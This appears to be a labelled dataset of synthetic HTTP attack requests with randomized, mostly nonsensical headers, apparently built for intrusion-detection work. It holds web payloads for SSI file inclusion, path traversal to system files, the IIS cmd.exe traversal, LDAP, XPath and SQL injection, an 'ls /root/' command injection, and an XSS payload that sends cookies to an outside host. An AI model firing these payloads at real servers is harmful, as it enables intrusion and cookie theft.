UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: 6.9 www.u3liee.gif, 4.1 www.y9nshn3A.jpg
Transfer-Encoding: eolri; tehwees=Ektirkw
Upgrade: utiuG/5.0
Warning: 966 www.behrc.jpeg "tmzezat" "Sat, 08 Apr 06 03:40:35 CET"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42606
Start - Id: 40571
class: SSI
GET /qo4uA3tif4z/mUn8Ks/@qHwj.html?RentmlCeauhane=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&1RbpD.Xr06d=tdB0kBK&ytlscmeoqdJIOJ=xn%7CtrmetaonsZ&l0wlsSN=emHe%28ntrmnsdecu&t0om=9160&HtTdee=012&IsnstitthIi=f7&eiilaveuMsg=01&2iatNztca=7488453 HTTP/1.0
Host: www.aIpseemae.st
Connection: dtearsne
Accept: */*
Accept-Charset: iso-8859-1;q=0.2, x-mac-hebrew, iso-8859-2;q=0.9, koi8-r;q=0.2, euc-cn;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 80.128.20.254
Cookie: rsF9ttb9Noyfrco=83765
Cookie2: $Version="360"
Date: Mon, 17 Sep 07 08:51:50 UTC
ETag: "tg04gPEz--@y5xVG@bDN"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sun, 10 Dec 06 17:24:05 UTC
If-Unmodified-Since: Thu, 08 Jun 06 19:09:12 GMT
If-Match: *
If-None-Match: "m3XJCyfgckt14Mfk"
If-Range: *
Max-Forwards: 83
MIME-Version: 7.9
Pragma: ueo='Teo'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Basic MmVwaHR0OmV3aGU=
Range: -296381
Referer: /nqa1o/ltdyL.php
TE: deflate;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/8.7 (X11; U; SunOS sun4u 8.0; re-dc; rv:5.8.3) Gecko/31790065
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Win9x
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: eoyc; nrmulOn7=AiiE45ts
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
X-Serial-Number: 56779
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40571
Start - Id: 45413
class: PathTransversal
POST /iE5A3r/e13yeioruhogRhWcEH2i/ts.tiff? HTTP/1.0
Content-Length: 181
Content-Language: u7i,isisorj
Content-Encoding: identity
Content-Location: /arekMaha/esm2b/ohrnt2/FbvoOo.wmn
Content-MD5: eWF0U3VSc2V1dGlhbXRobw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 24:09:24 UTC
Last-Modified: Fri, 28 Mar 08 10:03:27 UTC
Host: 118.226.150.101:72421
Connection: keep-alive
Accept: audio/x-wav, application/zip, text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="227"
Date: Thu, 20 May 04 23:29:41 CET
ETag: W/"-RB0JpWdFTdAI3JiPZ"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 08 Apr 06 03:12:23 GMT
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: *
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: Sat, 16 Dec 06 24:14:16 GMT
Max-Forwards: 4
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Digest username="ps6nrs"
Range: -40
Referer: http://www.2lit.be/eTas/Atat.asmx
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.0 (Windows; U; Windows NT 6.9; he-e2; rv:1.4.8) Gecko/16807326
UA-CPU: PowerPC
UA-Disp: 193,273,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 863x2272
Via: 4.3 www.lieir.js:2558, 1.1 201.241.148.50:59
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BczchildYdgkDy=>4i&pgeti3riE=46&iImuoeteitJqeil=vh@a&yo=..\..\..\..\WINDOWS\system.ini&ta1mwHmtoiiti3=lg-ways4sK&eMeparci=selectner3cmd+i&eeebne2polwadat=Nneufnasrn7

End - Id: 45413
Start - Id: 40695
class: SSI
GET /lci/otnr.msf?X3_Vp=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E HTTP/1.0
Host: www.p3nmot0f.st
Connection: tTqnusG
Accept: */*;q=0.2
Accept-Encoding: deflate;q=0.9, deflate
Cache-Control: no-store
Client-ip: 30.208.16.4
Cookie: oin=btonn
ETag: "TvF3n5tsPnT3lin"
Referer: /hqeeblR.wmn
TE: deflate,trailers,deflate;q=0.6
User-Agent: Iltkms8nco (hs24M.; tkP0QMHYw; lM7QFFR; mOIUpxiK2)
X-Forwarded-For: 222.69.126.206

null

End - Id: 40695
Start - Id: 38650
class: LdapInjection
GET /6YjS-XjPH/eqrGZd_nqbBbDEm8p/wvugP5cNQ/MbY7TidcatByA/dKs9eQE-HjhdIw/tm00BZU7q32lin/shd5hbE9SpemBri/t8q9KO-tpeT3YM/o8m1jdtmrcrEc/v.aRJphLrmTSH3L/a3RM0X-X58f.mspx?dGEENbKcdsOqorX=b9qoto&Ccpf34g3ps=o&ifYheJnetcatTAfzQ=qn1e%29%28%26%28objectClass++%3Dhaes*%29&xelird=8 HTTP/1.0
Host: www.reeb6teXi.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: adh8dpa0-xwYe, osaalse-n;q=0.3
Cache-Control: no-transform
Client-ip: 48.249.181.128
Cookie: ttasthtxnnygpse=LotrhamxeaMoovnlo;7edsU=2347;prxtre0=698129;lVMV9qGPYcR=vn4fmo;HmWV=5376594;rrw=n
Cookie2: $Version="7"
Date: Tue, 22 Mar 05 12:08:17 UTC
ETag: "eyDCB5QN-Yd1FZKT8r1y"
Expect: 100-continue
From: t4byed8@l9nss.fr
If-Modified-Since: Wed, 15 Apr 09 05:53:13 CET
If-Unmodified-Since: Fri, 08 Jun 07 09:41:25 CET
If-Match: "MTEBdKH10-iTV63"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 3.2
Pragma: hlhe='i5du'
Proxy-Authorization: NTLM aXllb3RQdGZmZXl0cEpsazlrc2VzZXNodGV1bG1nQWRv
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /w05ezse/lrsbpSe8.php3
TE: chunked;q=0.7,deflate
Trailer: Transfer-Encoding
User-Agent: 9enDbMaM8x http://www.diarct.gov
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: 0.7 168.204.43.177
Transfer-Encoding: LcgLle; esatst=Ihr3fw
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 923 31.36.82.245:31824 "1y3pAs" "Sun, 03 Oct 04 18:11:26 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 15901278083
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38650
Start - Id: 44942
class: PathTransversal
GET /Zh/yd8kwxfsvEeJsPQTZMP/1cvg5kjSR40sk-9f0vF/JahtmsIankhsCtBfh/aMGSVJ13ouSEc.mspx?ahjt1st=orfl&_or.h2SSzDUQq=62&ancaeheo=186701&o-Mjtmpaq88bodyV=collection%28+++++file%3A%2F%2F%2Fc%3A%2Fhfih%2Fei7st.xml+++%29 HTTP/1.1
Host: 106.255.123.35
Connection: t2geasOt
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: r-1galtUac;q=0.6, rsi-rrync;q=0.4
Cache-Control: max-stale=7
Client-ip: 92.170.136.192
Cookie: fotThYlbs=o9otySnW;sexrBwjtOciN=childitdyF;inhxmara=Tota;e4ElpaRn=90492
Cookie2: $Version="776"
Date: Fri, 20 Nov 09 24:20:12 GMT
ETag: W/"FTabip4q-bvxfAK_"
Expect: olpham=dewefu
From: idto@ug5qpuenx6.org
If-Modified-Since: Sat, 19 Jan 08 16:02:52 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:10:48 UTC
If-Match: "V@NlObOh6h9Xa1D"
If-None-Match: "1z7E2N9Lg@uLveYI"
If-Range: Thu, 03 Jul 08 10:20:20 CET
Max-Forwards: 4825
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: Digest username="oCam"
Range: 032407-30
Referer: http://sdyhh.cz/oadtaIe/ihggt/aLel/aipo6.pdf
TE: deflate
Trailer: Cache-Control
User-Agent: 3zczn5q (nPMeG@; nAAA6IA-; bfHdKl)
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2762x370
Via: HTTP/3.9 5.50.89.38
Transfer-Encoding: gzip
Upgrade: stntow/3.4, 4egw/7.2
Warning: 151 7.22.89.225 "tqonsaseaLehs" "Fri, 02 Feb 07 23:07:17 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44942
Start - Id: 48967
class: XPathInjection
GET /eu8ti/oLdkr1beeshtuoridf/elhdOdulnnMsoqtcenbt/e3tyuuXM3/y@2ro.jpg?2slrhnss=4&oSrtwd6=6736994&2b98tiZoethoEog=w2D7Yy7d9Ia&ro=qRehci%27++++or+++1%3C+++++emaet%2Fuq%2Fne%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D404%5D+++++or+++%27s6e%27+%3D%27 HTTP/1.0
Host: 123.3.97.87
Connection: close
Accept: */*
Accept-Charset: utf-8, x-mac-cyrillic, euc-kr;q=0.7
Accept-Encoding: *
Accept-Language: oljri-re, 7ov-o, trie-ono, gsR-hrl, tfs5lf-tt6na
Cache-Control: no-cache
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="6"
Date: Mon, 05 Nov 07 17:54:50 GMT
ETag: "joqqGKnroE3msmN_ZIE@"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sat, 15 Dec 07 17:00:37 CET
If-Unmodified-Since: Sun, 11 Apr 10 14:45:10 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8855
MIME-Version: 6.3
Pragma: 8sqe=13nrb
Proxy-Authorization: NTLM dG50cnJvdDJ0aWFpY29ZZWVocjRsTWxubm1hN2kwZXVhaGhjZURhbzNoYTA=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: /othtjl/tPyo/1agi/iteeearj/9nd7efW.aspx
TE: trailers,deflate;q=0.7
Trailer: Accept-Encoding
User-Agent: 0inoctE/0.4.8
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: 7.4 117.73.39.254
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48967
Start - Id: 46315
class: PathTransversal
GET /hyit8hdrgR3lnI3he/IHBC.8yC/eypatCiws/sPi6kr/tt6eeitaji/inhso.aspx?dai2c4ilaNosm=t4zjgg&catlXcZp2tPO=2710&VQrJdRN6Qf=dto+aORhl&nJzlRPq1bm9a=asahit&diw=joeriosabn&dt=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&zh3u9eEQ=dordomec%5ChaEti&aiejvretREa=Ioen%29&BvDT6ZJdj=uctyntrr&trhalaoes=6832&erlrsf9uRDrck=5484176&gcteHagesmscJes=sn&miuo=hehbntxiswinrqri&sock_streamdBlikez=jisnti58Itperlesh HTTP/1.0
Host: www.Ehtay7gIw.st
Connection: zmmrtr
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: n-Sszr, nttt-hssr
Cache-Control: no-store
Client-ip: 79.110.171.13
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="6"
Date: Sun, 27 Jun 04 01:32:35 CET
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Wed, 03 Oct 07 03:57:21 UTC
If-Unmodified-Since: Thu, 08 Jan 04 12:37:16 GMT
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: *
If-Range: "k9wIW5Jgkxl@8@S@"
Max-Forwards: 6
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: Basic aWhSc211bGc6NnlJbw==
Range: 426-9089,-721
Referer: /amDCoNh/teeaqga.css
TE: trailers
Trailer: Warning
User-Agent: dLY76D http://www.erriE3O.net
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.5 66.111.4.180, tIo/8.1 114.146.227.57:61
Transfer-Encoding: identity
Upgrade: edsi/9.9, 3eM/0.4, attaq/3.5, srnheu/2.0
Warning: 721 www.wehenl.jpeg "muIpoPasigatRbg" "Sun, 26 Jun 05 21:53:54 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46315
Start - Id: 38252
class: LdapInjection
GET /Cpb5kRrsVinncTreplace/NpxvercpX_wHexech/teemrbb8f1f/tn/eGgOZxi/uWUmo/JGrF.yb@/eMf94Mx.P.tiff?aAoodty=%29++++%28+%7C++++%28displayName%3Dhad*%29++%28name+%3D+++had*+++%29%28+++mail%3Dhad*%29&tESMlCehb7t=eP9KREZJ&sh=aats&ygservices4_K=10&Rleepdgust44p=Ytrts&nsuocAosao=58302&anSbrlqun2=535597&0OY0BMlogprocessing-instruction=9&estlscena=6276 HTTP/1.1
Host: www.heigstei.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.4, windows-1252
Accept-Encoding: 
Accept-Language: len5-s, bTuee-dH, r9-diE8d;q=0.7, or-dhhiaiy;q=0.7, hlu-xp4eachh
Cache-Control: only-if-cached
Client-ip: 113.81.106.78
Cookie: lKwisqatmCl=uqlO\;pskaerb8lpr=213;ubfextlfd7lzee=aF.Q;orioertuxcb=n8O@Wee6;Rde4=n3v_liOp
Cookie2: $Version="7"
Date: Sat, 07 Nov 09 24:07:52 CET
ETag: "HmmK-Pe-jjfxx-a"
Expect: 100-continue
From: Eorust@uthn0.it
If-Modified-Since: Thu, 30 Sep 04 23:14:00 UTC
If-Unmodified-Since: Mon, 04 Feb 08 01:07:30 UTC
If-Match: "LZFfgPJvCKS-RmsQGRlu"
If-None-Match: "BM5Iw0_2fJIZz3jEOH"
If-Range: *
Max-Forwards: 84
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: NTLM cmFubm5kUHViczJsYU9ORUxjYXR4YWduaWFPTHpwdDJuaG5hZHlydGtzc2llOXNS
Range: -465,47-4
Referer: /elOep.dll
TE: trailers,chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.1 (compatible; u8rmcbn; Win 9x; e2stas)
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: 9.2 www.lo6asdq.png
Transfer-Encoding: compress
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38252
Start - Id: 44447
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 80.197.158.188
Connection: close
Accept: application/*;q=0.0
Accept-Charset: us-ascii, x-mac-icelandic, x-mac-greek, us-ascii;q=0.7, euc-kr;q=0.4
Accept-Encoding: deflate;q=0.2, compress;q=0.6, compress
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 241.65.49.103
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Sat, 17 Jul 04 20:56:50 CET
ETag: "wXABuvWhF059r7z."
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Tue, 22 Mar 05 11:16:42 UTC
If-Unmodified-Since: Tue, 16 Jan 07 23:50:46 CET
If-Match: *
If-None-Match: ".hhTg4UUv.2jgebY"
If-Range: Sun, 18 Nov 07 09:01:11 GMT
Max-Forwards: 50
MIME-Version: 1.4
Pragma: Srea='efh'
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: /eoitzae/twT0m/wd3fdlw5.php3
TE: trailers
Trailer: From
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 4.6; n0-pt; rv:1.9.7) Gecko/10238676
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: FTP/4.4 231.44.23.23
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 0.187.253.54
X-Serial-Number: 45781122630812126119
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44447
Start - Id: 47200
class: XSS
GET /kvB/tadOiXKAyTE4s4.php4?4bqJfU=N&jvonsnreuMod=+&4DhLad=%3Cbody+++++onload+%3D%22++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.chnainse.com%2Fcgi-bin%2Fiser.cgi%27%2Bdocument.cookie%29%3B%5D++%22+++%3E HTTP/1.1
Host: 206.59.3.30
Connection: lgojiYp1
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: g-deoa, elbb-lqat, usy8hnoh-f;q=0.8
Cache-Control: max-age=6
Client-ip: 63.161.16.102
Cookie: kThJwtspreks2f=834;56P4N1II=GsodjNlY;Mq6oe=5;ek=e.eJv;S1AUm_shutdownCPH56=6691
Cookie2: $Version="4"
Date: Tue, 19 Apr 05 12:33:33 GMT
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: 100-continue
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Mon, 31 May 04 11:09:44 CET
If-Unmodified-Since: Sat, 26 Jun 04 10:15:04 GMT
If-Match: *
If-None-Match: *
If-Range: "K6hLdMPJPUPnTW8"
Max-Forwards: 7
MIME-Version: 9.5
Pragma: lttyp9=a
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Digest algorithm=MD5-sess
Range: 676-108618,2650-4238
Referer: http://shng.gov/daEssf/lksir/fAWel/inkm1h/ftkt.swf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.8 (compatible; Konqueror/1.0; SunOS sun4u; OuiMt4eyns; 5Sbv; ceee)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/0.9 0.129.47.217:19015, HTTP/2.2 195.32.189.7:0, 1.5 www.piIriuf.js:824
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47200
Start - Id: 50088
class: XPathInjection
POST /thvirno4geiaCtt/lLlB.mdb? HTTP/1.0
Content-Length: 64
Content-Language: mno,L
Content-Encoding: gzip
Content-Location: http://kimori.uk/qioini/EntAxt/oytdc/clheSsyu.wmn
Content-MD5: NWZyR3BzZHlzeUV0U2UyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Nov 09 10:16:52 GMT
Last-Modified: Wed, 07 Jan 09 21:54:35 CET
Host: 46.14.196.66
Connection: yxlat5ou
Accept: image/*;q=0.7, text/*, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 126.15.156.81
Cookie: ohRlLNioCaa9=998;oedfOsn=ctboot.inisrhc@urpu'ar;gmttitcEebgeo=t ;soolshrluds8ia=eegis;A1ontn3=wi'  or     1<  3/i73Rau/a7/child::text()[position()=449]   or  'fmohn'= ';3DensctoapW=optthe
Cookie2: $Version="50"
Date: Sun, 05 Oct 08 04:56:36 UTC
ETag: "h2ntYS_PIagTaRIj"
Expect: uSist
If-Modified-Since: Sat, 30 Aug 08 07:10:15 GMT
If-Unmodified-Since: Mon, 04 Jun 07 07:32:13 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Aug 04 18:36:55 CET
Max-Forwards: 1922
MIME-Version: 5.6
Pragma: on='tc6dEoe'
Proxy-Authorization: Digest algorithm=mrmdaea
Authorization: NTLM aHJoYXlFZGMyZWVlZ2ltb3cwZ2VUc3Jjc2N5M2l0b2VjRWVlc3QyZQ==
Range: -6254,-3
Referer: http://www.a1agt.ch/etntq/2thuq0r.js
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: ngsei9e
UA-CPU: 68000
UA-Disp: 534,2890,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4253x311
Via: HTTP/3.0 www.y0is7nir.css:7475, HTTP/5.7 105.120.30.240, FTP/3.6 208.14.199.106
Transfer-Encoding: compress
Upgrade: rinmv/0.0
Warning: 653 103.93.101.105:17 "aetlgatnhrco" 
X-Serial-Number: 0477829072611518
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tets3y6mfsseo=296248&xiwstoqilotsEhR=hd1&jhens10bunQe5Pr=1506985

End - Id: 50088
Start - Id: 36218
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 28.1.21.23
Connection: 58iwh
Accept: application/postscript
Accept-Charset: iso-8859-8-i, x-mac-japanese, euc-kr, x-mac-ce;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 253.92.235.246
Cookie: A0ruzsuariit=csm2Ce5Ruyihlsdh;wouervt=rhwflIqdyehH;JqFTsE6=g/f+;1a=e6eir
Cookie2: $Version="830"
Date: Thu, 19 Jun 08 18:19:09 GMT
ETag: W/"61@XYEowE14r6d8"
Expect: 100-continue
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 05 Aug 07 04:44:45 CET
If-Unmodified-Since: Sun, 11 Feb 07 19:49:27 GMT
If-Match: *
If-None-Match: "L5ApjO1QIDT3CZbXXwz"
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 869
MIME-Version: 3.7
Pragma: at='o'
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM bnBhSG9heGkzaGxvZUVvN293Y3o2ZW1ocEVyaHRheW90dG4xdGVlaXBMNHQ=
Range: 183-
Referer: http://www.tDla.net/spclsR/tih2Ts/idste/tnan/fthfn7er.zip
TE: trailers
Trailer: Accept-Language
User-Agent: ebyxSGNUvG http://www.ipshNhg.org
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: HTTP/5.2 www.eri0ib8.css:8671, HTTP/5.1 www.aneebj.shtml, HTTP/7.0 www.Abtrtn.html
Transfer-Encoding: gzip
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36218
Start - Id: 43033
class: OsCommanding
POST /hpretVeeeg.js? HTTP/1.1
Content-Length: 230
Content-Language: tpooowo,n7tphi,oelhn
Content-Encoding: deflate
Content-Location: /eecs/owily/m0sbyiA/tdrn.cgi
Content-MD5: dTBvRWlmd2FhczU0bHNoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Feb 08 01:51:29 UTC
Last-Modified: Wed, 25 Nov 09 02:51:28 GMT
Host: 207.104.157.251
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.8, utf-7, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: vdhtuUn='HeOe'
Client-ip: 65.119.102.85
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="6"
Date: Thu, 27 Jul 06 14:12:53 UTC
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: VsNdtdt@rdorILi.de
If-Modified-Since: Sat, 10 Apr 10 24:23:53 CET
If-Unmodified-Since: Mon, 07 May 07 24:31:59 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Sat, 12 Jan 08 10:38:17 CET
Max-Forwards: 567
Pragma: no-cache
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Digest realm
Range: -98633,070828-,-9277
Referer: /ntIneuLh/tItNbi/Ewkirkre/eiPodsi/nanixbh.mpeg
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 4.1; ni-om; rv:3.1.9) Gecko/43214384
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.6 www.w8es.html
Transfer-Encoding: compress
Upgrade: 6CozN/5.3, aqmg/9.3, yryyou/0.4, eket/6.8, aiea/8.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Uasayrlrl9tst=rqjiUmLz4&st7rhmrjiwnfuw=578769&ipuequkri=893591&n3nart9ezfota=?euhnEt&ooaer=\nls /root/&ad87n8b=anfn&Dawtyfae=uLtLoSHJHBCz&lE7et=0757&1rddeu7=she(sh&cd0ron3eeNoEro=bgiwreplace&uehgmaisp=372&oae3=7853306573

End - Id: 43033
Start - Id: 42161
class: SqlInjection
GET /equTeaeO5LsgHnnei/0xew3oey/rdBheFp/4vn5iDGU@tB/rt_vEoklZm/k.6qduetc11KHJ/iEr4wfdresiqni/uVWPm5s681xjcqw/WCH7tqHkUlWJchildun/erXikvFJ0txdnF-J/f9yAE9SYMhvVKMY-Zsw.cgi?vgcgnihgdb3oas=ocD-NxY.lMl&lbautL=4920017&ihf=geGdtnwa6txrt&1eafflehTutse=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F4%2F**%2FFROM%2F**%2F4w7m%2F**%2FWHERE%2F**%2F%28++++%27%27+++%3D++%27++%2F**%2F&qGt8xpceYt3esry=41870215&w4nBethtatueon=874&aiRhr5=de&rrAywiae=i9vrlr&dtae=0607611&x6=+%7Cmailexeclcar&lrEih=%3Fsnullrt%5Bh HTTP/1.0
Host: www.nnzan.net
Connection: close
Accept: image/gif;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: compress, deflate;q=0.6, deflate
Accept-Language: isheoE9-cee
Cache-Control: only-if-cached
Client-ip: 45.250.133.235
Cookie: suehwae7bmhtre=a+se ;nkohnfat=5;ssgfo=uscnvohl;ATgio=hhEz todaluniontmpinputc
Cookie2: $Version="18"
Date: Fri, 21 Jul 06 23:23:45 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: rrtt8nk0
From: tktabU@4ahlq0ig.org
If-Modified-Since: Tue, 28 Nov 06 07:39:49 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
